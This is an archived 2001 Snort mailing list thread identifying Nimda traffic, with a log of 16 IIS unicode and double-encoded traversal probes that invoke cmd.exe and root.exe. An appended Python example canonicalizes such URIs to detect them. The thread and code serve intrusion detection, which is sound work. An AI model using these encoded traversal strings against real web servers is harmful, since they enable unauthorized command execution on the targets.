Snort mailing list archives

RE: Not CodeGreen


From: "Ginnetty, James" <JGinnetty () skandia com>
Date: Tue, 18 Sep 2001 16:22:54 -0400

Definitely not our friend Code Red. Our log files are showing just how
pervasive this thing is. Looks like it will try 16 different exploit strings
in an attempt to infect another server before moving on to the next IP. Here
is a sorted cut from one of the logs. It is repeated many times over from
different IPs. No wonder the level of traffic....

  Jim

14:00:43  198.146.11.167  GET  /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43  198.146.11.167  GET  /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43  198.146.11.167  GET  /c/winnt/system32/cmd.exe?/c+dir
14:00:43  198.146.11.167  GET  /d/winnt/system32/cmd.exe?/c+dir
14:00:43  198.146.11.167  GET  /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:43  198.146.11.167  GET  /MSADC/root.exe?/c+dir
14:00:44  198.146.11.167  GET  /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44  198.146.11.167  GET  /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
14:00:44  198.146.11.167  GET  /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44  198.146.11.167  GET  /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
14:00:43  198.146.11.167  GET  /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
14:00:44  198.146.11.167  GET  /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
14:00:44  198.146.11.167  GET  /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
14:00:43  198.146.11.167  GET  /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:44  198.146.11.167  GET  /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
14:00:43  198.146.11.167  GET  /scripts/root.exe?/c+dir

-----Original Message-----
From: bthaler () webstream net [mailto:bthaler () webstream net]
Sent: Tuesday, September 18, 2001 3:43 PM
To: snort-users () lists sourceforge net
Subject: [Snort-users] Not CodeGreen


For everyone's information:

The inordinate amount of traffic you're most likely seeing today is almost
surely NOT CodeGreen.

CodeGreen was developed as a way to patch servers infected with CodeRed.
What you are most likely seeing is in fact "nimda", which by all accounts
seems like the last 3 or 4 big IIS exploits (CodeRed, Unicode, et al.)
rolled up into one big exploit.

Again, this is most likely NOT CodeGreen, even though some have referred to
it as that.

BTW, my Snort-1.7 MySQL database has surpassed 1,000,000 records just today,
and is still going strong.  How's that for scalability, baby?

I run Snort-Win32 on one NT SMP machine, and the database from another
machine, so the load gets balanced.

Hats off to Martin R, et al.

Regards,
Brad T.


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
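What the 16 probe strings in Jim's log have in common is that they only reach cmd.exe (or the root.exe copy of it) after the server has decoded the path more permissively than the rule writer expected: `%255c` and `%%35%63` are double-encoded backslashes, and `%c0%af` / `%c1%1c` are overlong or malformed two-byte UTF-8 that a lenient decoder folds to `/` and `\`. A signature that matches the literal string `cmd.exe` catches the plain `/c/winnt/...` form but is trivially evaded by the encoded ones, which is why a detector has to canonicalize first (Snort's http_decode preprocessor exists for exactly this). The following is an added example, not code from either poster or from the Snort project: it emulates that permissive decoding, resolves the traversal, and runs the check over a constructed tab-separated sample log in the same `time  IP  method  URI` shape as the excerpt above. The IP 192.0.2.10, the two benign control lines, and all function names are assumptions of the example.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log (tab-separated 'time ip method uri'). 192.0.2.10 is a
# documentation-range placeholder, not a real scanner; the final two lines are
# benign controls that a naive 'cmd.exe' or '%' match must NOT flag.
SAMPLE_LOG = """\
14:00:43\t192.0.2.10\tGET\t/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43\t192.0.2.10\tGET\t/c/winnt/system32/cmd.exe?/c+dir
14:00:43\t192.0.2.10\tGET\t/MSADC/root.exe?/c+dir
14:00:44\t192.0.2.10\tGET\t/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44\t192.0.2.10\tGET\t/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44\t192.0.2.10\tGET\t/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
14:00:43\t192.0.2.10\tGET\t/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:45\t192.0.2.10\tGET\t/index.html
14:00:45\t192.0.2.10\tGET\t/images/logo%20small.gif
"""

_PCT = re.compile(rb"%([0-9A-Fa-f]{2})")
SHELL_TARGETS = ("cmd.exe", "root.exe")  # root.exe: the cmd.exe copy left by Code Red II

def percent_decode_once(data: bytes) -> bytes:
    """One pass of %XX decoding. A malformed escape such as the leading '%%3'
    in '%%35%63' is left alone, so a second pass then sees '%5c' (backslash)."""
    return _PCT.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def fold_overlong_utf8(data: bytes) -> bytes:
    """Emulate the lenient two-byte UTF-8 decode behind %c0%af and %c1%1c:
    lead byte 0xC0-0xDF plus ANY next byte -> ((b1 & 0x1F) << 6) | (b2 & 0x3F).
    A result below 0x80 is an overlong encoding of plain ASCII, so emit it
    (0xC0 0xAF -> '/', 0xC1 0x1C -> '\\'); anything else is passed through."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:
                out.append(cp)
                i += 2
                continue
        out.append(b)
        i += 1
    return bytes(out)

def canonicalize(uri: str, max_rounds: int = 4) -> str:
    """Normalize a request path the way the targeted server effectively did:
    drop the query, percent-decode until stable (double encoding), fold
    overlong UTF-8, and treat backslash as a path separator."""
    raw = uri.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = percent_decode_once(raw)
        if decoded == raw:
            break
        raw = decoded
    return fold_overlong_utf8(raw).decode("latin-1").replace("\\", "/")

def escapes_root(path: str) -> bool:
    """True if resolving '..' segments ever climbs above the web root."""
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def classify(uri: str) -> Optional[str]:
    """Return a '+'-joined verdict for a probe, or None for a benign request."""
    canon = canonicalize(uri)
    reasons = []
    if escapes_root(canon):
        reasons.append("traversal-out-of-webroot")
    target = canon.rsplit("/", 1)[-1].lower()
    if target in SHELL_TARGETS:
        reasons.append("shell-request:" + target)
    if reasons and canon != uri.split("?", 1)[0]:
        reasons.append("encoding-evasion")  # only reached cmd.exe after decoding
    return "+".join(reasons) if reasons else None

def scan_log(text: str) -> List[Tuple[str, str, str, str]]:
    """Parse 'time\\tip\\tmethod\\turi' lines; return (time, ip, canonical, verdict) hits."""
    hits = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 4:
            continue
        when, ip, _method, uri = parts
        verdict = classify(uri)
        if verdict:
            hits.append((when, ip, canonicalize(uri), verdict))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("\t".join(hit))
```

Running it flags all seven probe lines and neither control line; the `/c/` and `/MSADC/root.exe` requests are reported as shell requests without traversal or encoding, because they rely on a mapped drive letter and on a backdoor left by an earlier worm rather than on the decoder. The same canonicalization is the reason a rule should be written against the decoded path, not the raw bytes on the wire.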